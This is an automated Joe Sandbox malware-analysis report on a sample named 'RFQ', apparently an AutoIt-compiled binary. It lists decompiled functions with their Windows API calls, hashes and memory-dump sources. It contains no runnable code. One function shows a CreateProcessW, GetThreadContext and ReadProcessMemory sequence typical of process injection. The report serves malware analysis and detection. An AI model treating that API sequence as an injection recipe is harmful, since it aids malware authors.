                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                                          • API String ID: 3938964917-2806939583
                                                                          • Opcode ID: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                                                                          • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                          • Opcode Fuzzy Hash: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                                                                          • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                          Function 00410100 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _strcat
                                                                          • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                          • API String ID: 1765576173-2684727018
                                                                          • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                          • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                          • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                          • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                          Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __wsplitpath.LIBCMT ref: 004678F7
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast__wsplitpath_malloc
                                                                          • String ID:
                                                                          • API String ID: 4163294574-0
                                                                          • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                          • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                          • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                          • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                          Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                          • _strcat.LIBCMT ref: 0040F786
                                                                            • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                            • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                          • String ID:
                                                                          • API String ID: 3199840319-0
                                                                          • Opcode ID: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                                          • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                          • Opcode Fuzzy Hash: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                                          • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                          Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                          • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: FreeInfoLibraryParametersSystem
                                                                          • String ID:
                                                                          • API String ID: 3403648963-0
                                                                          • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                          • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                          • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                          • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                          Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                          • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                          • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                          • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                          Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                          • __lock_file.LIBCMT ref: 00414A8D
                                                                            • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                          • __fclose_nolock.LIBCMT ref: 00414A98
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2800547568-0
                                                                          • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                          • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                          • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                          • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                          Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __lock_file.LIBCMT ref: 00415012
                                                                          • __ftell_nolock.LIBCMT ref: 0041501F
                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2999321469-0
                                                                          • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                          • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                          • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                          • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                          Function 040312E5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 04031AA3
                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04031B39
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04031B5B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1284925930.0000000004030000.00000040.00000020.00020000.00000000.sdmp, Offset: 04030000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4030000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 2438371351-0
                                                                          • Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                          • Instruction ID: eada1c1cf3de71a9acda7a873835fda71618f9feaa0c4dd5d706df0e748582f7
                                                                          • Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                          • Instruction Fuzzy Hash: A112EE24E24658C6EB24DF60D8507DEB272EF68301F1090E9910DEB7A4E77A5F81CF5A
                                                                          Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                                                                          • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                          • Opcode Fuzzy Hash: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                                                                          • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                          Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                          • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                          • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                          Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                                          • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                          • Opcode Fuzzy Hash: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                                          • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                          Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                                          • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                          • Opcode Fuzzy Hash: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                                          • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                          Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __lock_file
                                                                          • String ID:
                                                                          • API String ID: 3031932315-0
                                                                          • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                          • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                          • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                          • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                          Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                          • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                          • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                          • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                          Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __wfsopen
                                                                          • String ID:
                                                                          • API String ID: 197181222-0
                                                                          • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                          • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                          • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                          • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                          Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
